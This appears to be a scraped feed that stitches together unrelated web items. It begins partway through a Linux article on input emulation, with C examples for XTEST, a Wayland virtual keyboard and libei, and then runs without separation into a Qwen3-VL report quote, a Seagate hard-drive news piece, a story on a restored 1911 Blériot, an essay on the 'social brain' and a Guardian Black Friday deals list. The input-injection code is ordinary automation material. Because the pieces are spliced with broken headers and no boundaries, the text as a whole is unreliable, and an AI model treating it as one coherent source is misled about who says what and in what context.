clients interface through this extension they directly inject keyboard
and mouse events into the X server, bypassing the whole input stack,
and these events are propagated afterward to the X clients.
Let’s see a simple programming example relying on
XTEST(3)
that will
send the keysym “a”:
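A minimal sketch (assuming a running X session and libXtst; build with
something like gcc xtest_a.c -lX11 -lXtst):

#include <X11/Xlib.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>

int main(void)
{
    Display *dpy = XOpenDisplay(NULL);
    if (!dpy)
        return 1;

    /* The server maps keysyms to keycodes, so look up the keycode for "a" */
    KeyCode kc = XKeysymToKeycode(dpy, XK_a);

    /* Inject a key press followed by a key release into the server */
    XTestFakeKeyEvent(dpy, kc, True, CurrentTime);
    XTestFakeKeyEvent(dpy, kc, False, CurrentTime);

    XFlush(dpy);
    XCloseDisplay(dpy);
    return 0;
}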
That’s clean and easy, now on Wayland the picture is a bit more complex
since the protocol doesn’t allow clients to randomly generate input
events. It was designed this way for security reasons.
As with anything Wayland, there are a few unstable extensions, though
deprecated now, such as zwlr_virtual_pointer_v1 and
zwp_virtual_keyboard_manager_v1, mostly wlroots Wayland extensions. An
example with the zwp_virtual_keyboard_manager_v1 extension would look
somewhat like this:
#define _POSIX_C_SOURCE 200809L
#include <string.h>
#include <wayland-client.h>
#include "virtual-keyboard-unstable-v1-client-protocol.h"

static struct zwp_virtual_keyboard_v1 *vk;

static void global_add(void *data, struct wl_registry *reg, uint32_t name,
                       const char *iface, uint32_t ver)
{
    if (strcmp(iface, zwp_virtual_keyboard_manager_v1_interface.name) == 0) {
        struct zwp_virtual_keyboard_manager_v1 *mgr =
            wl_registry_bind(reg, name, &zwp_virtual_keyboard_manager_v1_interface, 1);
        // NULL seat → compositor chooses default seat
        vk = zwp_virtual_keyboard_manager_v1_create_virtual_keyboard(mgr, NULL);
    }
}

static const struct wl_registry_listener reg_listener = {
    .global = global_add,
    .global_remove = NULL
};

int main(void)
{
    struct wl_display *d = wl_display_connect(NULL);
    struct wl_registry *reg = wl_display_get_registry(d);
    wl_registry_add_listener(reg, &reg_listener, NULL);
    wl_display_roundtrip(d); // wait until vk is ready

    uint32_t keycode = 30;       // Linux evdev (KEY_A)
    uint32_t state_pressed = 1;
    uint32_t state_released = 0;

    zwp_virtual_keyboard_v1_key(vk, 0, keycode, state_pressed);
    zwp_virtual_keyboard_v1_key(vk, 0, keycode, state_released);
    wl_display_flush(d);
    return 0;
}
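Note that virtual-keyboard-unstable-v1-client-protocol.h is not a system header: it is generated from the protocol XML with wayland-scanner, and the client links against wayland-client. A real client would also normally upload a keymap through the protocol before sending keys, so the compositor knows how to interpret the evdev keycodes.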
But for a better example check the source of
wlrctl
that also relies on the
zwp_virtual_keyboard_manager_v1
extension.
Yet, these days, this isn’t the path that Wayland has taken, and
compositors don’t agree on these extensions; instead they rely on libei,
a library to consolidate Emulated Input. This is its architecture:
It has two pieces: a client side that creates virtual devices and
generates evdev events, and a server side called EIS that lives within
the compositor (but isn’t limited to Wayland) and is responsible for
handing a file descriptor to the client to interface with, and for
dispatching received events to where they need to go. The dispatching
could happen through uinput devices, that’s an implementation detail,
but most compositors just keep it as an internal virtual device.
This allows the compositor to be aware of who is currently emulating input,
which capabilities they require (keyboard, touch, pointer), and to
restrict and/or suspend devices at any time.
Optionally, the compositor may delegate the file descriptor mechanism to
an xdg-desktop-portal dbus service implemented by the desktop environment,
so that it can check the allowed permissions with polkit and others
(see). So it would look like this:
An example implementation of a client can be found
here
.
Or mixed with an XKB mess to translate from keysym to keycode, for the
pleasure of your eyes:
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <ei.h>
#include <xkbcommon/xkbcommon.h>

int main(void)
{
    // ----------------------------
    // 1. Create an XKB context
    // ----------------------------
    struct xkb_context *ctx = xkb_context_new(XKB_CONTEXT_NO_FLAGS);
    // load the default system keymap (XKB rules, model, layout, variant, options)
    struct xkb_keymap *keymap = xkb_keymap_new_from_names(ctx, NULL, XKB_KEYMAP_COMPILE_NO_FLAGS);
    if (!keymap) {
        fprintf(stderr, "failed to load xkb keymap\n");
        return 1;
    }

    // ----------------------------
    // 2. Convert keysym → evdev code, but only for group 1 and level 1
    // ----------------------------
    xkb_keysym_t sym = xkb_keysym_from_name("a", XKB_KEYSYM_NO_FLAGS);
    // if we knew the key by name it would be much easier:
    // xkb_keycode_t code = xkb_keymap_key_by_name(keymap, "AD01");
    // But better: find the keycode for the keysym.
    xkb_keycode_t key = 0;
    // Iterate keycodes until we find one producing this keysym,
    // because the keycode->keysym mapping is many-to-one.
    xkb_keycode_t min = xkb_keymap_min_keycode(keymap);
    xkb_keycode_t max = xkb_keymap_max_keycode(keymap);
    for (xkb_keycode_t k = min; k <= max && !key; k++) {
        const xkb_keysym_t *syms;
        int nsyms = xkb_keymap_key_get_syms_by_level(keymap, k, 0, 0, &syms);
        for (int i = 0; i < nsyms; i++) {
            if (syms[i] == sym) {
                key = k;
                break;
            }
        }
    }
    if (!key) {
        fprintf(stderr, "could not map keysym\n");
        return 1;
    }
    // IMPORTANT: xkbcommon keycodes are +8 relative to evdev
    int evdev_code = key - 8;

    struct ei *ei = ei_new();
    // compositor socket; we'd need to get it through the portal in a real scenario
    ei_connect(ei, "unix:path=/run/user/1000/ei_socket");
    struct ei_client *client = ei_get_client(ei);
    ei_client_set_name(client, "xkb-sender");
    struct ei_device *dev = ei_device_new(client, "xkb-virt-keyboard0");
    ei_device_add_capability(dev, EI_DEVICE_CAP_KEYBOARD);
    ei_device_start_emulating(dev);

    // press and release
    ei_key(dev, evdev_code, true);
    ei_key(dev, evdev_code, false);

    ei_flush(ei);
    ei_disconnect(ei);
    ei_free(ei);
    return 0;
}
Then obviously the EIS side has to catch these events and handle
them. There’s also an example that creates uinput devices found
here
.
The main logic of an EIS implementation is quite straightforward (from the official docs):
- create a context with eis_new()
- set up a backend with eis_setup_backend_fd() or eis_setup_backend_socket()
- register the eis_get_fd() with its own event loop
- call eis_dispatch() whenever the fd triggers
- call eis_get_event() and process incoming events
And whenever a new client connects:
- accept new clients with eis_client_connect()
- create one or more seats for the client with eis_client_new_seat()
- wait for EIS_EVENT_SEAT_BIND, then create one or more devices with the bound capabilities, see eis_seat_new_device()
That’s kind of like network programming, as sketched below.
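Put together, the skeleton of such a loop could look roughly like this. The eis_* setup and dispatch calls are the ones listed above; the header name, the eis_new() argument, the event-type accessor and the exact event names are assumptions here, so treat this as a sketch against the real libeis API rather than a drop-in implementation:

#include <poll.h>
#include <libeis.h>                 /* header name is an assumption */

int main(void)
{
    struct eis *eis = eis_new(NULL);                      /* create the context */
    eis_setup_backend_socket(eis, "/run/user/1000/eis-0");

    struct pollfd pfd = { .fd = eis_get_fd(eis), .events = POLLIN };

    /* register the fd with an event loop; here a plain poll() loop */
    while (poll(&pfd, 1, -1) > 0) {
        eis_dispatch(eis);

        struct eis_event *ev;
        while ((ev = eis_get_event(eis)) != NULL) {
            /* eis_event_get_type() is an assumed accessor name */
            switch (eis_event_get_type(ev)) {
            /* on a new connection: eis_client_connect() + eis_client_new_seat() */
            case EIS_EVENT_SEAT_BIND:
                /* the client bound capabilities: create devices with
                 * eis_seat_new_device() and hand them back */
                break;
            default:
                /* key/button/motion events get forwarded to the real input path */
                break;
            }
        }
    }
    return 0;
}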
So far, most Wayland compositors implement this mechanism
along with portals. You can see the list of support
here
, from
GNOME, KDE, XWayland, and more.
On that note, XWayland is both an X server and a Wayland client, so it
understands XTest requests. What happens when it receives them is that,
internally, it relies on the libei client side to handle virtual device
events. That means xdotool can work on XWayland in a libei context. The
full path looks like this:
- An X11 client sends a key event using XTEST (normal)
- XWayland receives it and initiates a Remote Desktop XDG Portal session to … your own system (???)
- The XDG Portal uses DBus in an odd way, with many method calls receiving responses via signals, because DBus isn’t designed for long asynchronous methods
- Once the Remote Desktop portal session is set up, XWayland asks for a file descriptor to talk to a libei server (emulated input server)
- After that, libei is used to send events, query the keyboard map, etc.
- You can ask libei for the keyboard mapping (keycodes to keysyms, etc.): you get another file descriptor and process that with yet another library, libxkbcommon (a small sketch of that step follows)
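For that last step, the usual pattern is to mmap the keymap file descriptor and feed it to libxkbcommon. A minimal sketch, assuming the fd and its size were already obtained from the emulated-input side and that the keymap data is null-terminated (as Wayland keymap fds are):

#include <sys/mman.h>
#include <xkbcommon/xkbcommon.h>

/* Turn a keymap fd (plus its size) into an xkb_keymap. The fd and size are
 * assumed to have been handed over by the compositor/emulated-input side. */
static struct xkb_keymap *keymap_from_fd(struct xkb_context *ctx, int fd, size_t size)
{
    char *buf = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (buf == MAP_FAILED)
        return NULL;

    struct xkb_keymap *keymap = xkb_keymap_new_from_string(
        ctx, buf, XKB_KEYMAP_FORMAT_TEXT_V1, XKB_KEYMAP_COMPILE_NO_FLAGS);

    munmap(buf, size);
    return keymap;
}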
The main issue is that if the libei client gets its file descriptor
via the dbus portal, then every time it asks for it the user will get
prompted with “Allow remote interaction?”. And most portal software doesn’t
have a config or whitelist-rule mechanism to skip that (as far as I know),
which would make sense while keeping the same security level.
When it comes to remote desktop on Wayland, it’s quite similar: it
relies on the same libei mechanism. Yet, as far as input goes, we need
to add to the equation a listener that captures input regardless of the
focused window.
Remote desktop is also achieved with libei and a dbus xdg-desktop-portal,
either org.freedesktop.portal.RemoteDesktop or .InputCapture, which will
give back to the client a special file descriptor for listening to the
input stream. And similarly, it is always explicit about asking for
permission to share input or share the screen (or a specific
window/surface), and there doesn’t seem to be a general configuration
to turn it off or whitelist certain clients (see discussion).
Let’s note that in the case of Wayland it is the compositor that usually
provides VNC/RDP servers, for example KWin and GNOME Mutter (apart from
wayvnc
for wlroots compositors).
Meanwhile, on X11 remote desktop was part of the X11 protocol itself
from the start, with full access to all the events. The X server
can be on another machine and clients can communicate with it over the X11
protocol, or the events can be forwarded over ssh and the like. VNC and
other remote desktop protocols can rely on this openness too. Plus, XTEST is
there for injecting events. There’s no limitation on apps reading the
screen framebuffer either, sending it, and drawing it in another X session,
though the screen is often re-rendered when doing remote desktop (x11vnc,
TigerVNC, etc.). There have been extensions over the years for security
(XACE), but nobody relies on them.
There’s also xrdp, but this creates a whole new virtual Xorg session,
so it’s another story.
Let’s now review a couple of tools used for automation.
We’ve already seen quite a lot of the ones that rely on evdev and uinput,
but now they will make more sense with our current context:
- evmux and inputattach: multiplex multiple evdev devices into a single virtual stream
The most popular tool that relies on XTEST (plus EWMH and others) is
xdotool
.
NB
: the “toplevel-management” Wayland “unstable” extension somewhat
replaces some of the EWMH functionality, but it’s not implemented by most
compositors for security reasons.
Similar tools to xdotool, but that rely on uinput, are ydotool and dotool.
We’ve seen wlrctl, which relies on the unstable wayland protocol for
wlroots-based compositors. There’s also wtype, which relies on the same
unstable virtual keyboard protocol.
We can also perform automation via very specific desktop
environment mechanisms. That means using something such as GNOME Shell
extensions, which have a JavaScript API. KDE has a similar concept,
and the utility kdotool relies on it.
As you’ve observed, the situation on Wayland is a bit fragmented when
it comes to automation, both in utilities and extensions.
Input Method
In this last section we’ll explore the concept of input method (IMF &
IME), a mechanism to input keysym/characters that are not natively
available on the user’s input device. This is necessary for languages
that have more graphemes than there are keys on the keyboard.
There are two sides to the equation: the IMF, the input method framework,
and the IME, the input method engine, which works within the framework. The
input method framework’s role is to pick the most appropriate way
to enter the text, shape it, and return it to the widget. The IME is
basically the place where input is interpreted in whatever way, shape, form,
or logic, to produce the text that the IMF asked for.
The IMF can also act as a wrapper over XKB configs, to allow easily swapping
between keyboard layouts; this coexists with the idea of switching between
different IMEs.
Simply said, the IME is a middleman between the keyboard and the actual
output text when relying on the toolkit/widget.
The input method plugs into the whole input stack at the window
client side, within the widget/toolkit library, in the input
handling event loop. After the client performs the keycode-to-keysym
translation and composing, it calls the toolkit’s configured
input method, which reroutes it to the IM pipeline. Within the
pipeline, the IMF implementation talks over its protocol to have
the IME interpret the input and return preedit and committed text. This
is in turn pushed back to the toolkit to display.
That means that simply by relying on input widgets from a framework
such as GTK or Qt, the integration with the input method is handled
automatically.
Some of these input frameworks are swappable, either because they talk
over the same protocol, be it the old deprecated XIM protocol for legacy
purposes (X Input Method, an X protocol extension), or because they
plug straight into the widget framework as a module, which is mostly the
case today.
There are a lot of IMFs and IMEs implementations, and interoperability,
see this list
.
These days the two major IMFs are IBus (Intelligent Input Bus, common in GTK-based
environments like GNOME) and Fcitx5 (common in Qt-based environments like KDE).
To swap between them, if they are compatible with the toolkit, one can
set the toolkit-specific environment variables; for IBus that typically means
GTK_IM_MODULE=ibus, QT_IM_MODULE=ibus and XMODIFIERS=@im=ibus (Fcitx5 uses
the corresponding fcitx values).
For example, the path that the text takes with IBus looks like this:
Application → GTK/Qt IM module → D-Bus → IBus/Fcitx
→ IME → D-Bus → GTK/Qt widget
As you can see, this bypasses the graphics server entirely, be it the
X server or the Wayland compositor.
Yet for it to work across the Wayland ecosystem, and not only in some
toolkits like GTK and Qt (games, electron apps, java apps, sandboxed apps,
etc.), the IMF/IME stack needs to be able to listen to key events from
any application, provided it is focused, get the surrounding context,
take field focus, and inject text into clients. This is why some
“unstable” extensions were created, mostly the “text-input-unstable-v3”
(zwp_text_input_v3) and “input-method-v2” (zwp_input_method_v2)
protocols. With these, there can be consistent IM behavior across all
applications without compromising security.
On a side note, this same extension protocol for injecting text can be
used for the speech-to-text accessibility framework. In practice this
can either be done via a virtual input device, or a specific desktop
service mechanism integrated in the toolkits. We have a desktop service
catching voice input, a standalone voice recognizer to convert it to
text, and a virtual keyboard or feature to inject events. For example,
GNOME VoiceInput, Plasma Whisper Integration, QtSpeech, SpeechDispatcher,
Caribou, Onboard, or GNOME Accessibility Services (AT-SPI). We won’t
go into details on that, nor mention text-to-speech, since it’s outside
our scope.
One issue remains though, related to the key repeat rate
and delay, which on Wayland is implemented client-side. It’s
not implemented by IMs, and is apparently tough to handle (see).
And that's it!
Conclusion
Congratulations for making it this far into the article!
We’ve covered a lot of ground, literally from hardware to the very
abstract components of the graphical input stack.
I have some hope that in the future there will be a more common
way to configure the Wayland input stack across compositors, with
fewer discrepancies and less fragmentation. I also wish the XKB stack would
one day get cleaned up, but on this one my hopes are pretty low. It’s
fallen victim to entropy and chaos.
A huge gigantic thanks to “who-t” aka Peter Hutterer, whose
blog
has
been my trusty companion for the past months.
We need more articles like this in the age of AI overlords, so please
share it if you’ve enjoyed it!
Thanks for reading, have a wonderful end of day!
NB: This article compiles my understanding; for any corrections, please
contact me.
If you want to have a more in-depth discussion, I'm always available by
email or irc
.
We can discuss and argue about what you like and dislike, about new ideas to consider, opinions, etc.
If you don't feel like "having a discussion" or are intimidated by emails,
then you can simply say something small in the comment section below
and/or share it with your friends.
Quoting Qwen3-VL Technical Report
Simon Willison
simonwillison.net
2025-11-27 17:01:11
To evaluate the model’s capability in processing long-context inputs, we construct a video “Needle-in-
a-Haystack” evaluation on Qwen3-VL-235B-A22B-Instruct. In this task, a semantically salient “needle”
frame—containing critical visual evidence—is inserted at varying temporal positions within a long video.
The model is then tasked with accurately locating the target frame from the long video and answering the
corresponding question. [...]
As shown in Figure 3, the model achieves a perfect 100% accuracy on videos up to 30 minutes in
duration—corresponding to a context length of 256K tokens. Remarkably, even when extrapolating to
sequences of up to 1M tokens (approximately 2 hours of video) via YaRN-based positional extension,
the model retains a high accuracy of 99.5%.
Hard drives remain a vital component in building high-capacity storage solutions, especially in the data center. IT Home
reports
that
Seagate
is continuing to break barriers on how many TBs can be stored on a single hard drive and has achieved a whopping 6.9TB per platter in its laboratory, making 55TB to 69TB hard drives a possibility for the first time.
Seagate's experimental 6.9TB platter boasts more than double the capacity of platters it uses in official products right now. Outgoing models such as Seagate's 30TB HAMR HDDs use 10 3TB platters to reach maximum capacity. With 6.9TB platters, Seagate will be able to build drives with more than double the capacity of its outgoing drives in the same form factor.
Seagate is leveraging its heat-assisted magnetic recording (HAMR) technology to deliver its 6.9TB platter. If you want to check out how Seagate's HAMR technology works, check out our
previous coverage
. In a nutshell, HAMR uses heat-induced magnetic coercivity to write to a hard drive platter. In Seagate's outgoing drives, this tech is combined with Mozaic 3+ to reduce the media grain size compared to typical HDD platters.
However, these 6.9TB platters are still in development and are not planned to be used for another 5 years. Seagate's roadmap reveals that 6.9TB platters won't be used in official products until 2030. In the meantime, Seagate is working on developing 4TB, 5TB, and 6TB platters that will enter production in 2027, 2028, and 2029, respectively. But the company won't be stopping there; it projects that it will have 7TB to 15TB platters available from 2031 onward. Assuming nothing changes, Seagate could likely have petabyte-sized hard drives before 2040.
Seagate's continuous improvements in hard drive capacity will be vital to keeping up with the increasing demand for hard drives. Despite the rise in SSD maturity, hard drives are still the backbone of the world's long-term storage, thanks to better
reliability
and far superior storage capacity per drive (for the most part) and storage capacity per dollar. Hard drive reliability has only improved as the AI boom gobbles up hard drive orders, leaving HDD manufacturers with
2-year backorders on hard drives
alone.
Luckily, this problem has mostly been relegated to datacenter drives (for now). If you are looking to pick up a new hard drive right now, be sure to check out our best
Black Friday HDD deals for 2025
, which include a 24TB Seagate BarraCuda discounted to just $239.99 (at the time of writing).
Fabricated by teenage brothers in 1911, this unique homebuilt is once again airworthy.
Despite its shortcomings, the Blériot XI was one of the great designs of aviation’s early years. The successful fruit of numerous prior attempts—and failures—by French pioneer aviator Louis Blériot, it was tricky and even dangerous to fly, largely because its horizontal stabilizer had an airfoil like the wing, which could cause the nose to suddenly pitch down during high-speed dives. When Blériot piloted the shoulder-winged monoplane on a historic 23½-mile hop across the English Channel in July 1909, however, he won his design a worldwide stamp of approval beyond its inherent merits. From then on, aviators out to score more firsts in distance, speed, altitude or endurance, or simply out to experience the thrill of early flight for its own sake, wanted a Blériot XI. Besides the examples Blériot produced, a number of other companies on either side of the Atlantic manufactured it under license, while other budding fliers built their own planes based on its basic layout. It was in that last category that the VanDersarl brothers staked their modest claim to fame.
Little is now known about Jules “J.J.” VanDersarl and his younger brother, Frank, except that they lived just outside Denver, Colo.; their mother worked as a housekeeper; and they barely made it through grade school. But both brothers proved to have innate mechanical talents that made them proficient at machining, carpentry and other skills. Given that, it’s not surprising these young men, like a good many others at the time, became enthralled with aviation. J.J. experimented with gliders at age 12, and later, a few months after Blériot’s 1909 Channel flight, he and Frank got more ambitious. Obtaining all the publications and photographs they could, they used those references to build their own Blériot XI in 1911…then learned to fly it.
According to Javier Arango, director of The Aeroplane Collection in Paso Robles, Calif., who now owns the VanDersarl Blériot, the brothers “must have had some guidance and lots of information,” because the dimensions of their airplane are close to those of the original. Their homebuilt differs from the standard Blériot XI in three respects, however. First and foremost, instead of the 25-hp Anzani 3-cylinder radial or Gnome rotary engine that normally powered Blériots, the VanDersarls, using their general knowledge and machining skills, adapted a 4-cylinder inline air-cooled automobile engine with a reworked oil system to aerial use. Just what that engine was remains uncertain, though Arango said it was “close in dimensions” to the power plant used in the Metz, a car equipped with a liquid-cooled engine that the company had planned to adapt to aviation but which never quite materialized.
A second difference, Arango noted, was that “some of the structure around the empennage is placed slightly differently than in most Blériots.” Finally, he said, “The French Blériots were built to a high quality, but our plane was built by teenagers in Colorado who just wanted to go fly—it’s a little rougher than pristine Blériots.”
Even so, the handmade airplane worked remarkably well. “There is a photo of the first flight, which ended up in a landing that broke the landing gear,” Arango reported. “But it was repaired and flew again. Both brothers flew it.”
The VanDersarls went on to fly Curtiss JN-4 Jennys and Standards, and in the 1920s, Arango said, “Frank started an airport and barnstorming operation.” The most remarkable thing, though, is that Frank kept the homebuilt in which he and J.J. had first learned how to fly. “I’m so glad they kept it,” Arango remarked. “This breed of airplane is quite rare. The Smithsonian Institution has only one such aircraft.”
In the 1960s Frank VanDersarl tried to restore the Blériot, but he died before completing the project. After J.J. VanDersarl died in Raton, N.M., in November 1977, the monoplane was exhibited at the Museum of New Mexico. In 1994 it was bought by Joseph Gertler, who loaned it to Dowling College in Bayport, N.Y. There it was further restored by John Zale, Frankie Mineo, Russ Moore and the Bayport Aerodrome Society. Then in 2009 Arango’s C.C. Air Corporation purchased it and added it to The Aeroplane Collection, with the ultimate goal of making it airworthy for the first time in a century.
“When we got it the plane was minimally restored,” Arango explained. “It was extremely authentic.” That meant it served as a useful reference toward the inevitable replacement of deteriorated material and components. “Chuck Wentworth from Antique Aero, who is really the main character in the restoration project, inspected it and went through everything,” he said. “The entire fuselage was in good shape. There were busted wires and turnbuckles that had to be reproduced and replaced to get it back to original condition. Chuck had to find parts of 1911 vintage to get the correct look, based on plans and photos. For example, they’d stuck a fake control wheel in the cockpit for display. We took all of that out.
“The wings were difficult—they were not the same age as the fuselage. They were probably damaged and were repaired or rebuilt by the VanDersarls. It took a lot of work with the wings to make them airworthy. The cotton covering was difficult to work with, and we even had to find the ‘honey-colored coating’ the VanDersarls described. We used a varnish that was tinted to get the correct honey color.”
Though he considered obtaining an Anzani engine, Arango decided to heed the advice of the National Air and Space Museum and “keep it as it was” by reconstructing the original engine. Fortunately for the restoration team, the VanDersarls “left good data on the cylinders, the copper cooling fins—all the specifications we needed to build the engine from scratch. The engine was put together with help from period publications and photos of the original.” The most difficult part was getting period components, but they managed to obtain a 1905 Bosch magneto, a brass carburetor of 1909 vintage, a tachometer, a magneto switch and a 1910 automobile oil gauge. In 2011 Wentworth unveiled the Blériot at the National Aviation Heritage Invitational in Reno, Nev. There on September 18 it won the event’s top award, the Rolls-Royce Aviation Heritage Trophy.
Once the four-year project was completed, Arango and his team went through a systematic process toward getting it approved for flight by the Federal Aviation Administration. This presented some challenges, Arango said, since the Blériot XI predated the Civil Aeronautics Administration, let alone the FAA, and “there is no certificate and no paperwork of the age to make it current.” After the FAA inspected the aircraft, however, it finally registered the VanDersarl Blériot as an experimental airplane on August 16, 2012. This meant it could be flown under certain restrictions, such as not carrying a passenger for hire and with limits on the number of flights and travel radius around the airfield. “That was fine by us,” said Arango, “because we were happy to just fly, more or less in a straight line.”
Even with FAA approval, the VanDersarl Blériot underwent testing, reinspection and taxiing trials before it finally got airborne for the first time in more than a century on November 3, 2012. Since then, Arango keeps its flight itinerary at Paso Robles under tight self-imposed restrictions. “It’s a marginal airplane,” he explained, “with a 50-hp engine and very cambered wings that cause a lot of drag. It’s a good-flying airplane, but I’m not going to risk the airframe. It’s one of a kind, touched twice by its creators, and once by Chuck. I wanted it authentic to its own type.”
Originally published in the March 2014 issue of
Aviation History
. To subscribe, click
here
.
Have you ever noticed how
just
before sharing your work, you suddenly spot all its flaws? This isn't just a coincidence or bad luck. It's your social brain kicking into gear.
When making something with others in mind, you activate the parts of your brain wired for social interaction. This social brain is disproportionately powerful – it's the same neural machinery that makes us instinctively notice faces in a crowd or prioritize human voices over background noise.
Think of it like lifting with your legs instead of your back. Your legs are designed for carrying heavy loads safely and efficiently, while your back is more vulnerable and prone to injury when misused. Similarly, your social brain is optimized for clear communication and spotting problems, while your solitary thinking is more susceptible to blind spots and lazy reasoning.
Here are some ways you can deliberately trigger this superpower:
Imagine a specific person.
What questions would they have? What background knowledge are they missing? What would they disagree with?
Speak your ideas aloud.
The act of verbalization forces clarity in a way silent thinking doesn't. It can also help you spot overly complicated ways of saying something.
Share drafts with friends.
Even just the
anticipation
of real feedback sharpens your thinking.
Turning on your social brain can also help with Writer's Block. When I'm staring at a blank page, I try to imagine explaining my half-formed idea to a curious friend. Suddenly, I "hear" their natural follow-up questions, guiding my next steps.
Important caveat: Relying too heavily on your social brain can lead to people-pleasing and safe, boring work. You might avoid real creative risks if you rely on it too much. The sweet spot is using your social brain as a clarity tool, not as the ultimate judge of what's worth creating. Use it to sharpen the ideas you care about, not to replace them with what you think others want to hear.
Next time you're struggling with a project—whether it's writing, designing, coding, or something else entirely—try shifting your perspective. Instead of wrestling with your ideas alone, lean on the strength of your social brain. Your thoughts become sharper, logical gaps become obvious, and unnecessary complications fall away. It's not a panacea, but it can be a helpful tool.
Your social brain isn't just for socializing; it can also be a powerful intellectual tool. All you need to do is remember to switch it on!
The best Black Friday 2025 deals in the UK on the products we love, from electric blankets to sunrise alarms
Guardian
www.theguardian.com
2025-11-27 16:23:15
We’ve cut through the noise to find genuinely good Black Friday discounts on Filter tried-and-tested products across home, tech, beauty and toys • How to shop smart this Black Friday• The best Black Friday beauty deals Like Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuleti...
Like Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuletide now seems to start roughly when Strictly does, and Black Friday seemed to kick off around Halloween. But now, at last, we’ve reached the day that puts the “Friday” into Black Friday.
Black Friday is a devil worth dancing with if you want to save money on products you’ve had your eye on. Some of the Filter’s favourite items spent most of November floating around at prices clearly designed to make them sell out fast. Other deals have been kept back until now, and some won’t even land until the daftly named Cyber Monday (1 December).
As ever, we’d encourage you not to buy anything unless you really need it and have the budget to do so – read our advice on
how to shop smartly
.
Here’s our fully updated guide to the best genuine Black Friday bargains on the Filter’s favourites, from Anker battery packs to KidiZoom cameras via the espresso machine you loved more than any other product this year.
The key to
shopping smart
on Black Friday, Cyber Monday or any discount event is to know what you want – and we’re here to help you target the good stuff. We’ve tested thousands of products at the Filter in 2025 and warmly recommended hundreds of them, including many that have genuinely good Black Friday discounts.
Instead of listing price cuts on all the products we’ve featured, we’ve focused on the things you’ve liked the most this year, and looked for deals that undercut their long-term average prices by a significant amount. Ideally, their Black Friday price will be their lowest of the year.
We don’t take retailers at their word on discount size, either. Amazon may say it’s “70%” off the RRP, but we study the price history of every item using independent tools such as
the Camelizer
to find out how generous a discount really is. If an item’s price has been all over the place in 2025, we’ll give the average price below instead of a “was …” price, so you can judge how good a deal it is.
Q&A
How is the Filter covering Black Friday?
At the Filter, we believe in buying sustainably, and the excessive consumerism encouraged by Black Friday doesn’t sit easily with us. However, we also believe in shopping smarter, and there’s no denying that it’s often the best time of year to buy big-ticket items that you genuinely need and have planned to buy in advance, or stock up on regular buys such as skincare and cleaning products.
Retailers often push offers that are not as good as they seem, with the intention of clearing out old stock, so we only recommend genuine deals. We assess the price history of every product where it’s available, and we won’t feature anything unless it is genuinely lower than its average price – and we will always specify this in our articles.
We only recommend deals on products that we’ve tested or have been recommended by product experts. What we choose to feature is based on the best products at the best prices chosen by our editorially independent team, free of commercial influence.
The best
Black Friday deals on the Filter’s favourite products
The best home and mattress deals
The best artificial Christmas tree
Habitat 6ft mixed top upswept Christmas tree, £84 (was £120)
Habitat’s gloriously lifelike and easy-to-assemble tree topped our test to find the
best artificial Christmas trees
, and as December rattles towards us it’s inevitably discounted for Black Friday. The code XMAS30 will get you 30% (£36) off.
Heated fleece throw
Silentnight luxury heated throw, from £36 (was £45)
One of Amazon’s best sellers this Black Friday but 25p cheaper at Boots, Silentnight’s toasty fleece blanket was one of the lighter and thinner options in our
best heated throws
roundup. That makes this 120 x 160cm throw ideal for wrapping around yourself (and no-one else) on the sofa as the evenings grow ever colder.
Owlet’s feature-packed smartphone-compatible baby monitor was one of the favourite
baby products
when we spoke to parents last year. If you’d rather not give your £199 to Amazon, John Lewis is only 99p more.
The best combination steam cleaner
Vax Steam Fresh Total Home mop, from £84 (was £160)
Emerging from Stuart Andrews’
best steam cleaners
test as the “best combination cleaner”, Vax’s versatile mop proved easy and effective to use on multiple surfaces and tight corners. The handheld bit detaches easily from the body then slots back in when needed, and you get an array of brushes, scrapers, pads and nozzles. This dirt-blitzing package has dropped more than 40% at Currys and Amazon.
Smart wake-up and reading light
Philips SmartSleep sleep and wake-up light, £139.99 (avg £179.61)
When testing products for his guide to the
best sunrise alarm clocks
, our writer Pete Wise was struck by how well this one worked as a reading light. “Even when a bright setting is selected, the light seems relatively mellow and restful,” wrote Pete, who also liked the range of alarm sounds and audio input option. He found it a little too expensive, however – and it’s still north of £100, but somewhat less so.
A heated airer dries your clothes fast enough to avoid the dreaded stink of slow-dried laundry, and without the cost or noise of a tumble dryer. Lakeland’s three-tier heated airer – the top performer in our
heated airers
test – has proved enduringly popular with the Filter’s readers, and is now at its lowest price ever. Lakeland has also dropped the price of the
airer with cover
to £195.98 for Black Friday.
The best hybrid mattress
Photograph: Jane Hoskyn/The Guardian
Otty Original Hybrid double, £533.58 with code THEFILTER7 (was £647.99)
The most comfortable and supportive foam-and-springs hybrid of all the
mattresses
we’ve tested, the Otty already came at an impressive price of £647.99 for a double, but the Filter’s exclusive code gives you a small but perfectly welcome additional 7% off for Black Friday. For a deeper dive into this cosy mattress, read our
Otty Original Hybrid review
(spoiler: it gets five stars).
One of your favourite Filter recommendations of the year, this gentle
sunrise alarm clock
will wake you up with kittens purring, birdsong, gently brightening light – or a plain old alarm sound if you prefer. It’s been around for a few years and saw a price hike in 2022 (cost-of-waking-up crisis?) before settling at just under £50 from most retailers, so this is a deal worth grabbing.
Mattress “discounts” may seem to be a 24/7/365 thing, but UK watchdogs have given companies short shrift over money-off claims that aren’t all they seem. We’ve certainly noticed Simba playing by the rules lately, and its current 30%-off sale is the first we’ve seen in months. The excellent
Simba Hybrid Pro
, another of our
best mattresses
, is now hundreds of pounds cheaper in all sizes, from single (now £599.25) to super king (now £1,091.22).
Wool mattress topper
Woolroom Deluxe wool topper (double), from £148.74 (was £174.99)
The sustainably sourced wool in Woolroom’s bedding is a hypoallergenic temperature regulator, helping to keep you warm in winter and cool on hotter nights. The company’s deluxe
mattress topper
adds a touch of softness to a too-hard mattress, and is one of the easiest toppers we tested to move and store. Woolroom’s 35% isn’t quite as big a discount as Amazon’s, but it applies to everything on its site, including duvets, mattresses and linens.
Powerful pressure washer
Bosch UniversalAquatak 135 high pressure washer, £135 (was £209)
Blitz the gunk from your patio, decking, gutters and any flat surface you find yourself unable to resist pointing the nozzle at. Our writer Andy Shaw found the UniversalAquatak to be the most powerful of all the
pressure washers
he tested, and he thought its price was reasonable too. It’s now even cheaper for Black Friday, although not quite its lowest price of 2025 – it was briefly (very briefly) under £120 for Prime Day.
